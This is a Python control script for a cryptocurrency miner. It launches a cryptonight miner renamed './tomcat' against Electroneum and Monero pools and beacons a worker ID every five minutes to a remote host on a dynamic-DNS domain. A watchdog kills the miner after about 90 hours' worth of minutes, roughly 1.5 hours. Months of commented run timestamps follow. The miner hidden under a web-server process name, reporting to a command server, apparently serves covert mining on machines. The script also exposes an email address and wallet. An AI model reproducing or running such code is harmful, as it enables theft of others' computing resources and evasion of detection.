import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:02.139102
#2018-02-17 16:49:01.554264
#2018-02-17 18:37:06.130599
#2018-02-17 20:24:01.332252
#2018-02-17 22:11:01.428835
#2018-02-17 23:55:07.926871
#2018-02-18 01:46:03.958892
#2018-02-18 03:33:03.745646
#2018-02-18 05:19:07.433637
#2018-02-18 07:11:07.487903
#2018-02-18 08:59:01.722305
#2018-02-18 10:45:08.705111
#2018-02-18 12:33:01.695597
#2018-02-18 14:20:03.033768
#2018-02-18 16:10:09.138552
#2018-02-18 17:58:03.605190
#2018-02-18 19:45:01.676715
#2018-02-18 21:31:04.308621
#2018-02-18 23:19:04.215063
#2018-02-19 01:07:03.646330
#2018-02-19 02:53:02.104385
#2018-02-19 04:39:05.148351
#2018-02-19 06:23:02.132466
#2018-02-19 08:12:05.126066
#2018-02-19 10:02:01.269029
#2018-02-19 11:50:12.001989
#2018-02-19 13:36:06.030403
#2018-02-19 15:24:09.439069
#2018-02-19 17:12:09.987752
#2018-02-19 18:59:08.804492
#2018-02-19 20:46:08.647478
#2018-02-19 22:34:03.601542
#2018-02-20 00:19:01.786610
#2018-02-20 02:06:06.888900
#2018-02-20 03:55:07.255254
#2018-02-20 05:40:08.405624
#2018-02-20 07:27:05.571521
#2018-02-20 09:12:01.582462
#2018-02-20 10:55:01.794203
#2018-02-20 12:42:10.592944
#2018-02-20 14:27:06.579507
#2018-02-20 16:13:01.766822
#2018-02-20 17:58:06.463858
#2018-02-20 19:49:05.549012
#2018-02-20 21:32:06.473083
#2018-02-20 23:15:08.734113
#2018-02-21 01:01:06.246501
#2018-02-21 02:48:05.457392
#2018-02-21 04:37:05.122255
#2018-02-21 06:25:01.314969
#2018-02-21 08:11:04.954929
#2018-02-21 09:57:08.766788
#2018-02-21 11:44:07.144687
#2018-02-21 13:36:07.107236
#2018-02-21 15:20:07.234233
#2018-02-21 17:10:08.456286
#2018-02-21 18:59:07.171419
#2018-02-21 20:47:08.572193
#2018-02-21 22:31:07.555004
#2018-02-22 00:21:07.055221
#2018-02-22 02:09:06.814998
#2018-02-22 03:54:06.102898
#2018-02-22 05:41:04.388787
#2018-02-22 07:26:02.193808
#2018-02-22 09:13:03.736697
#2018-02-22 11:00:09.103876
#2018-02-22 12:47:01.719048
#2018-02-22 14:33:01.767070
#2018-02-22 16:20:02.887945
#2018-02-22 18:07:01.861740
#2018-02-22 19:55:04.411235
#2018-02-22 21:44:01.656353
#2018-02-22 23:31:06.226951
#2018-02-23 01:19:01.655771
#2018-02-23 03:05:08.796251
#2018-02-23 04:53:05.066879
#2018-02-23 06:36:05.208278
#2018-02-23 08:24:05.757149
#2018-02-23 10:40:07.513830
#2018-02-23 12:34:04.511556
#2018-02-23 14:21:01.758242
#2018-02-23 16:12:07.164601
#2018-02-23 17:59:01.714819
#2018-02-23 19:44:04.222651
#2018-02-23 21:26:03.468862
#2018-02-23 23:13:06.848830
#2018-02-24 01:02:07.870660
#2018-02-24 02:55:08.118091
#2018-02-24 04:44:06.712631
#2018-02-24 06:31:03.948747
#2018-02-24 08:19:06.342335
#2018-02-24 10:03:05.911563
#2018-02-24 12:00:05.793325
#2018-02-24 13:48:05.164365
#2018-02-24 15:36:03.816905
#2018-02-24 17:31:05.877164
#2018-02-24 19:18:01.933333
#2018-02-24 21:10:09.253079
#2018-02-25 01:17:01.877630
#2018-02-25 05:15:10.156835
#2018-02-25 11:05:01.498640